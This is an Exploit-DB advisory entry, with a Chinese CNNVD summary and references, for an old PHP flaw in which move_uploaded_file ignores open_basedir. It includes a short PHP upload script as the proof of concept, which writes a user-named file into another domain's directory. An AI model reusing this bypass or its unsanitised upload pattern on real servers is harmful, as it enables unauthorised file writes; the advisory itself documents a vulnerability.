https://www.exploit-db.com/exploits/21347
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-205

PHP中的move_uploaded_file不检查基础目录（open_basedir）。远程攻击者可以利用该漏洞下载系统非计划位置文件。

source: http://www.securityfocus.com/bid/4325/info

PHP is a server side scripting language, designed to be embedded within HTML files. It is available for Windows, Linux, and many Unix based operating systems. It is commonly used for web development, and is very widely deployed.

It has been reported that the move_uploaded_file function lacks an open_basedir check. The effect of this issue is that this function may be used to perform file operations on directories outside of those specified by the open_basedir setting.

This vulnerability may not be exploited to overwrite existing files. 

<?

$file = $HTTP_POST_FILES['file']['name'];
$type = $HTTP_POST_FILES['file']['type'];
$size = $HTTP_POST_FILES['file']['size'];
$temp = $HTTP_POST_FILES['file']['tmp_name'];

$size_limit = "100000"; // set size limit in bytes

if ($file){
if ($size < $size_limit){

move_uploaded_file($temp,
"/domains/somebodyelse.org/public_html/www/test/".$file);
echo "The file <tt>$file</tt> was sucessfully
uploaded";
} else {
echo "Sorry, your file exceeds the size limit of $size_limit
bytes";
}}

echo "
<form enctype='multipart/form-data' action=$PHP_SELF method=post>
Upload a file: <input name='file' type='file'>
<input type='submit' value='Upload'>
</form>
";
?>

来源:BUGTRAQ
名称:20020321Re:move_uploaded_filebreakssafe_moderestrictionsinPHP
链接:http://online.securityfocus.com/archive/1/263259
来源:BUGTRAQ
名称:20020317move_uploaded_filebreakssafe_moderestrictionsinPHP
链接:http://online.securityfocus.com/archive/1/262999
来源:bugs.php.net
链接:http://bugs.php.net/bug.php?id=16128
来源:BID
名称:4325
链接:http://www.securityfocus.com/bid/4325
来源:XF
名称:php-moveuploadedfile-create-files(8591)
链接:http://www.iss.net/security_center/static/8591.php
来源:BUGTRAQ
名称:20020322Re:move_uploaded_filebreakssafe_moderestrictionsinPHP
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=101683938806677&w;=2